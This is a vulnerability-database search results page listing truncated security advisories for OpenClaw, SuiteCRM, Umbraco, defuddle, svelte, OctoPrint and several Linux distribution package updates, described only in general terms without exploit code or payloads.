326 matches found
GHSA-86JJ-29WC-7Q2W Duplicate Advisory: OpenClaw's Signal reaction-only status events could, in limited cases, be enqueued before access checks
Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-792q-qw95-f446. This link is maintained to preserve external references. Original Description OpenClaw versions prior to 2026.2.25 contain an access control vulnerability in signal reaction notification handling...
CVE-2026-32050
OpenClaw is affected in versions prior to 2026.2.25. The vulnerability arises in signal reaction notification handling, where an access control failure allows unauthorized senders to enqueue status events before authorization checks are applied. Specifically, the reaction-only event path in event...
CVE-2026-32050 OpenClaw < 2026.2.25 - Unauthorized Reaction Status Event Enqueue via Access Check Bypass
OpenClaw versions prior to 2026.2.25 contain an access control vulnerability in signal reaction notification handling that allows unauthorized senders to enqueue status events before authorization checks are applied. Attackers can exploit the reaction-only event path in event-handler.ts to queue...
CVE-2026-29106
Summary: CVE-2026-29106 affects SuiteCRM prior to 7.15.1 and 8.9.3. The return_id request parameter value is copied into an HTML tag attribute that is an event handler and enclosed in double quotes, enabling a blind XSS condition. The issue is addressed in versions 7.15.1 and 8.9.3 (patches). Mit...
CVE-2026-29106
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management CRM software application. Prior to versions 7.15.1 and 8.9.3, the value of the returnid request parameter is copied into the value of an HTML tag attribute which is an event handler and is encapsulated in double quotati...
EUVD-2026-13369
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management CRM software application. Prior to versions 7.15.1 and 8.9.3, the value of the returnid request parameter is copied into the value of an HTML tag attribute which is an event handler and is encapsulated in double quotati...
Umbraco has Stored XSS in UFM Rendering Pipeline via Permissive DOMPurify Attribute Filtering
Description An authenticated backoffice user with access to Settings can inject malicious HTML into property type descriptions. Due to an overly permissive attributeNameCheck configuration /.+/ in the UFM DOMPurify instance, event handler attributes such as onclick and onload, when used within...
CVE-2026-31833 Umbraco has Stored XSS in UFM Rendering Pipeline via Permissive DOMPurify Attribute Filtering
Umbraco is an ASP.NET CMS. From 16.2.0 to before 16.5.1 and 17.2.2, An authenticated backoffice user with access to Settings can inject malicious HTML into property type descriptions. Due to an overly permissive attributeNameCheck configuration /.+/ in the UFM DOMPurify instance, event handler...
Cross-site Scripting (XSS)
Overview defuddle is an Extract article content and metadata from web pages. Affected versions of this package are vulnerable to Cross-site Scripting XSS via the findContentBySchemaText fallback in src/defuddle.ts. An attacker can execute arbitrary scripts in consuming applications extensions,...
Cross-site Scripting (XSS)
Overview org.webjars.npm:svelte is a package for building web applications. Affected versions of this package are vulnerable to Cross-site Scripting XSS via the spread syntax when rendering attributes from untrusted data during server-side rendering. An attacker can execute arbitrary JavaScript i...
OctoPrint 1.11.2 - File Upload
Exploit Title: OctoPrint 1.11.2 - File Upload Date: 2025-09-28 Exploit Author: prabhatverma.addada Vendor Homepage: https://octoprint.org Software Link: https://github.com/OctoPrint/OctoPrint Affected Versions: = 1.11.2 Patched Versions: 1.11.3 CVE: CVE-2025-58180 CVSS per advisory: 7.5 Platform:...
MiracleLinux 8 : thunderbird-128.2.0-1.el8_10.ML.1 (AXSA:2024-8858:20)
The remote MiracleLinux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the AXSA:2024-8858:20 advisory. thunderbird: 115.15/128.2 mozilla: Type confusion when looking up a property name in a with block CVE-2024-8381 mozilla: Internal event interfaces...
RDMA/irdma: avoid invalid read in irdma_net_event
...
Unity Linux 20.1070a Security Update: kernel (UTSA-2025-989284)
The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2025-989284 advisory. In the Linux kernel, the following vulnerability has been resolved: rtc: cmos: Fix event handler registration ordering issue Because acpiinstallfixedeventhandler...
EUVD-2019-19182
Malware in sbrugna...
EUVD-2011-0792
Malware in sbrugna...
EUVD-2016-6213
Malware in sbrugna...
EUVD-2018-17610
Malware in sbrugna...
EUVD-2018-3915
Malware in sbrugna...
EUVD-2017-6361
Malware in sbrugna...